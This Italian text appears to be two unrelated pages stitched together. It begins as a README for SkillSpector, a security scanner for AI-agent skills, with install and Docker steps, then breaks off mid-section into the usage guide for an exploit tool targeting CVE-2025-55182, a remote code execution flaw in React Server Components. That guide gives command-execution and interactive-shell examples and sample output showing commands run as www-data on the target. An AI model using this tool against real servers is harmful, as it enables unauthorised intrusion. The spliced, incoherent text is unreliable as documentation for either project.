Scanner di sicurezza per le skill degli agenti AI. Rileva vulnerabilità, pattern dannosi, rischi di sicurezza, prompt injection, esfiltrazione di dati e rischi della supply chain nelle skill di Claude Code, Codex e MCP prima di installarle.
Scanner di sicurezza per le skill degli agenti AI. Rileva vulnerabilità, pattern malevoli e rischi di sicurezza prima di installare le skill degli agenti.
Le skill degli agenti AI (utilizzate da Claude Code, Codex CLI, Gemini CLI, ecc.) vengono eseguite con fiducia implicita e una verifica minima. Nel sottoinsieme di 31.132 skill analizzate del dataset di ricerca, il 26,1% delle skill contiene vulnerabilità e il 5,2% mostra una probabile intenzione malevola.
SkillSpector ti aiuta a rispondere alla domanda: "Questa skill è sicura da installare?"
SkillSpector fa parte della pipeline NVIDIA Verified Skills, che analizza, valuta e firma le skill degli agenti prima della pubblicazione. Le skill che superano i controlli vengono pubblicate nel catalogo delle skill NVIDIA.
/skillspector per scansionare le skill dall'interno delle sessioni degli agenti.Avviso sul software open source: Questo progetto scaricherà e installerà ulteriori progetti software open source di terze parti. Esamina i termini di licenza di questi progetti open source prima dell'uso.
Crea e attiva prima un ambiente virtuale (tutti i target di make presuppongono che il venv sia attivo). Usa uv o pip; il Makefile usa uv se disponibile, altrimenti pip.
Installazione rapida con uv (solo CLI):```bash uv tool install git+https://github.com/NVIDIA/skillspector.git
Se prevedi di eseguire `skillspector mcp`, installa l'extra MCP al momento dell'installazione:```bash
uv tool install 'skillspector[mcp] @ git+https://github.com/NVIDIA/skillspector.git'
Dalla fonte:```bash
git clone https://github.com/NVIDIA/skillspector.git cd skillspector
uv venv .venv && source .venv/bin/activate
make install
make install-dev
### Docker (nessun Python richiesto)
Esegui SkillSpector senza installare Python compilandolo localmente dal [Dockerfile](https://github.com/nvidia/skillspector/blob/main/Dockerfile) incluso. L'immagine si basa sull'immagine Docker Official Python `3.12-slim-bookworm`.
**Compila l'immagine:**```bash
make docker-build
# or: docker build -t skillspector .
Scansiona una directory locale montando la tua directory corrente in /scan, la directory di lavoro del container:```bash
docker run --rm -v "$PWD:/scan" skillspector scan ./my-skill/ --no-llm
**Scansione con analisi LLM** passando le credenziali tramite un file `.env` locale:```bash
cat > .env <<'EOF'
SKILLSPECTOR_PROVIDER=anthropic
ANTHROPIC_API_KEY=sk-ant-...
EOF
python3 CVE-2025-55182.py -u <URL> [opzioni]
| Opzione | Descrizione | Predefinito |
|---|---|---|
-u, --url | URL di destinazione (obbligatorio) | - |
-c, --cmd | Comando da eseguire | id |
-t, --timeout | Timeout della richiesta in secondi | 10 |
-v, --verbose | Abilita output dettagliato | False |
--check | Modalità di verifica della vulnerabilità | False |
--shell | Modalità shell interattiva | False |
--proxy | URL del proxy (es. http://127.0.0.1:8080) | None |
--headers | Intestazioni personalizzate (formato JSON) | None |
--cookies | Cookie (formato stringa) | None |
--no-color | Disabilita output colorato | False |
Verifica della vulnerabilità:
python3 CVE-2025-55182.py -u http://target.com --check
Esecuzione di un comando:
python3 CVE-2025-55182.py -u http://target.com -c "whoami"
Shell interattiva:
python3 CVE-2025-55182.py -u http://target.com --shell
Con proxy:
python3 CVE-2025-55182.py -u http://target.com --proxy http://127.0.0.1:8080 -c "id"
Con intestazioni personalizzate:
python3 CVE-2025-55182.py -u http://target.com --headers '{"Authorization": "Bearer token"}' -c "id"
Con cookie:
python3 CVE-2025-55182.py -u http://target.com --cookies "session=abc123" -c "id"
[*] Verifica della vulnerabilità di http://target.com
[+] Il target sembra VULNERABILE!
[+] Payload inviato con successo
[+] Tempo di risposta: 0.523s
[*] Target: http://target.com
[*] Comando: id
[+] Invio del payload...
[+] Comando eseguito con successo!
--- Output del comando ---
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------
[*] Target: http://target.com
[*] Modalità shell interattiva
[*] Digitare 'exit' o 'quit' per uscire
shell> whoami
www-data
shell> ls -la
total 48
drwxr-xr-x 1 root root 4096 Nov 15 10:30 .
drwxr-xr-x 1 root root 4096 Nov 15 10:30 ..
-rw-r--r-- 1 root root 220 Nov 15 10:30 .env
...
shell> exit
[*] Uscita...
Il tool sfrutta CVE-2025-55182, una vulnerabilità di prototype pollution in React Server Components che porta a RCE (Remote Code Execution).